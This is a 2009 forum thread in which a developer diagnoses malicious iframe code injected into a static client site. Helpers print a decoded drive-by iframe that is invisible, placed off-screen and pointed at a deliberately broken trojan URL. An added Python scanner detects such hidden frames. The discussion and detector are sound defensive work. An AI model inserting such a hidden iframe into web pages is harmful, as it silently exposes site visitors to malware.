Code Injection Problem 4

vicvirk

Programmer
Feb 4, 2009
636
CA
Hey Everyone,

I posted this in the Javascript forum, someone suggested I try here, view the full current discussion at:


------------------------

I have a website with JS as the only scripting language used - all the webpages have HTML extensions. The server is a LAMP setup, but I am not using any PHP or MYSQL on the site, again all pages are static with NO CMS and no forms.

The website itself does not contain any scripting pages (i.e. .php) within the directory structure. All I am using is:

1. .HTML pages
2. .CSS for stylesheets
3. .JS for javascript functions (there are about 3-4 in total)
4. Google Analytics

I am now having a problem with CODE INJECTION where some of the pages contain that dreaded iframe tag with script tags pointing to trojan files.

I don't want to post a link to the site just in case someone who doesn't have virus protection goes to it.

At this point, I cannot turn off the site, but will be able to do so later this afternoon (I'm in the Pacific time zone - North America)

So my questions are:

1. Can someone (or thing) inject code using javascript - if yes, how do I prevent it (a link to a reference will do if it's a lot of information...I can't seem to find one)

2. What other ways (if not JS) could the code injection be happening (if not through JS)?

3. Is there a forum on this site dedicated to these type of issues???

Thanks everyone..

--------
GOOGLE is a great resource to find answers to questions like "how do i..."

If you don't know exactly what you want to do or what to search on, try Google Suggest: --------
I have recently been semi-converted to ensuring all my code (well most of it) works in both javascript and non-javasc
 
No scripting pages, no cms?

My first guess would be: you caught a trojan on your computer which has grabbed your ftp info; the hacker then logged into your webmaster FTP account and injected the code thusly.

Do a thorough malware/spyware scan.

Cheers,
MiS

"We had to turn off that service to comply with the CDA Bill."
- The Bastard Operator From Hell
 
I see you have already been advised about a possible infection in the other thread.
Have you checked that?

"We had to turn off that service to comply with the CDA Bill."
- The Bastard Operator From Hell
 
I would concur. I doubt it is coming over the Web from the pages. The door in is from your machine or the server. The server itself could very well be compromised.

 
I do have virus protection on my dev machine and it's scanned everyday - I'll do a full scan tonight and advise my clients to do the same.

This is the only client that has been infected, so I am assuming it's either on their machine or it's their server.

MakeItSo - you are correct, NO CMS and no Server Side scripting. The only external call that is made is to google analytics, other than that, everything is local to the domain.

I'll do my scan tonight and post the results - thanks for your help everyone...

 

In particular, check the last link. All in all, I agree that it sounds more like client-side FTP than something on the server, since it only affects one site. Can you copy and paste the iframe/JavaScript to the iframe? Maybe we can figure out what it is.

----------------------------
"Will work for bandwidth" - Thinkgeek T-shirt
 
TechieMicheal,

It's an isolated client, all of my clients are. I develop on my machine and then FTP the files to wherever they need me to - sometimes it's as simple as a public FTP site and they take care of the publishing, other times it's directly to their production server after they've seen a preview of it on my development server (I've even copied sites to CD and sent them by courier).

I do have other client FTP information on my computer, but none of those sites have been infected - so that leads me to believe that my computer is locked down pretty good - but I'll still do a full scan tonight when I get home (it's still morning where I am and I'm at my reg full time job at the moment)

Here is a link to the source as read by W3C's validator - the extra script is causing the validation errors...you'll notice the code just before the closing </head> tag - the source is provided at the bottom of the page:


Thanks

 
It might be a good idea to take the site down ... Google has already picked it up as a malware site.

I took the liberty of decoding the JavaScript for you.

Code:
<iframe width="480" height="60" src="hxxp://tr aff ics-inspector.cn/daily_ stats/i n.cg i?3" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

I have intentionally broken the URI, but you get the idea. Is this a shared webserver that they are hosted on? Have you contacted the webhost to see if other sites have been compromised?

Either way, I highly recommend you take the site down until you can figure out what's going on.

----------------------------
"Will work for bandwidth" - Thinkgeek T-shirt
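
An added example, not part of the original posts: a scan of a static site's HTML files for the kind of frame decoded above, flagging any iframe or script whose src host is off an allowlist and any iframe styled to be invisible. The allowlist, the names `audit_html` and `audit_tree`, and the sample page with its placeholder host `injected.example` are assumptions for illustration.

```python
import re
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

# Assumption: the one third-party host these static pages legitimately load from.
ALLOWED_HOSTS = {"www.google-analytics.com"}
# Hiding tricks from the decoded iframe, plus display/visibility as a generalization.
HIDING = re.compile(
    r"opacity\s*[:=]\s*0(?![.\d])|(?:left|top)\s*:\s*-\d|"
    r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

class FrameAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (line, tag, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        host = urlparse(a.get("src", "").strip()).hostname
        if host and host not in ALLOWED_HOSTS:
            reasons.append("off-site src: " + host)
        if tag == "iframe" and HIDING.search(a.get("style", "")):
            reasons.append("hidden by style")
        if reasons:
            self.findings.append((self.getpos()[0], tag, reasons))

def audit_html(text):
    """Return findings for one page's markup."""
    parser = FrameAudit()
    parser.feed(text)
    return parser.findings

def audit_tree(root):
    """Map every .htm/.html file under root that has findings to them."""
    report = {}
    for path in sorted(Path(root).rglob("*.htm*")):
        hits = audit_html(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample page; injected.example is a placeholder host.
SAMPLE = """<html><head><script src="js/menu.js"></script>
<script src="http://www.google-analytics.com/ga.js"></script>
<iframe width="480" height="60" src="http://injected.example/in.cgi?3"
 style="position:relative; left:-500px; opacity:0"></iframe></head></html>"""
```

Calling `audit_tree()` on a local copy of the document root lists every page that carries such a tag, which also shows how many files need to be restored from a clean copy.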
 
CERT has issued a warning on Gumblar which may be related to your problem. You can read about it at SearchSecurity.com.



James P. Cottingham
I'm number 1,229!
I'm number 1,229!
 
Looks like it was an issue with the hosting company - I got in touch with someone there and they said that a lot of other sites on the same box were infected with the exact same thing. The source is unknown at this time.

I'll be "fixing" it tonight, and have suggested to my clients that the site be moved to another host as soon as possible - they agree.

Thanks everyone for your help...

 
Glad you got it worked out. You'll probably have to contact Google (or perhaps it'd be better coming from your host since your site wasn't the only one affected) to get them to remove the suspicious listing.

----------------------------
"Will work for bandwidth" - Thinkgeek T-shirt
 